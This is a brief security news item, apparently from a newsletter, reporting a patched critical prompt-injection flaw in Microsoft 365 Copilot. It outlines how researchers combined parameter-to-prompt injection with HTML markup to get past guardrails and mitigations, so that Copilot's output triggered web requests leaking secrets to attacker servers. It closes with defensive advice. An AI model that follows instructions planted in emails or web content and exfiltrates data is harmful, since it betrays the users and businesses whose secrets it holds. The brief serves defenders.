In detail
- Microsoft patched a vulnerability rated max critical in M365 Copilot last week.
- Researchers used a Parameter‑to‑Prompt Injection plus markup/HTML techniques to bypass guardrails and cause Copilot outputs to trigger web requests that send secrets to attacker servers.
- Built‑in mitigations (wrapping output in <code> blocks, limiting allowed domains) can be circumvented by the exploit chain.
- Root cause identified: LLMs cannot reliably distinguish user instructions from instructions embedded in third‑party content.
Why it matters
The finding exposes a structural risk in AI assistants: they can be coerced into leaking secrets, which threatens any business process that feeds emails or web content into LLMs for summarization or automation.
For you Audit AI workflows that read emails or third‑party content, restrict Copilot access to sensitive mailboxes, disable automated form submissions, and increase monitoring of MFA/2FA attempts.